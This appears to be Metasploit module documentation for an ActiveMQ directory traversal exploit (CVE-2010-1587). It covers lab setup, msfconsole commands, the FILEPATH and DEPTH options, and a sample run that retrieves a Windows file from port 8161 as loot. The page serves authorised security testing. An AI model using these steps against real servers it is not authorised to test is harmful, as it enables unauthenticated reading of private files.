Apache Activemq Traversal - Metasploit Framework

Vulnerable Application

This module exploits a directory traversal vulnerability in Apache ActiveMQ 5.3.1 and 5.3.2 on Windows systems. The flaw exists in the Jetty ResourceHandler that ships with these versions, allowing an unauthenticated attacker to read arbitrary files from the target host.

The vulnerability is tracked as CVE-2010-1587.

Setup

To test this module you need a Windows host running one of the affected versions:

Download Apache ActiveMQ 5.3.1 or 5.3.2.
Extract the archive and run bin\activemq.bat to start the broker.
The web console listens on port 8161 by default.

Verification Steps

Start msfconsole
Do: use auxiliary/scanner/http/apache_activemq_traversal
Do: set RHOSTS [target IP]
Do: set RPORT 8161
Do: run
You should see the contents of the requested file saved as loot.

Options

FILEPATH

The path of the file to retrieve from the target system, relative to the drive root. The default value is /windows\\win.ini. Backslashes must be used for path separators on Windows targets.

DEPTH

The number of traversal sequences (/\..) to prepend to the request. The default is 4. If the file is not found, try increasing this value.

Scenarios

ActiveMQ 5.3.1 on Windows Server 2003 SP2

msf > use auxiliary/scanner/http/apache_activemq_traversal
msf auxiliary(scanner/http/apache_activemq_traversal) > set RHOSTS 192.168.1.100
RHOSTS => 192.168.1.100
msf auxiliary(scanner/http/apache_activemq_traversal) > set RPORT 8161
RPORT => 8161
msf auxiliary(scanner/http/apache_activemq_traversal) > run

[*] 192.168.1.100:8161 - Sending request...
[*] 192.168.1.100:8161 - File saved in: /root/.msf4/loot/20250319120000_default_192.168.1.100_apache.activemq_123456.txt
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed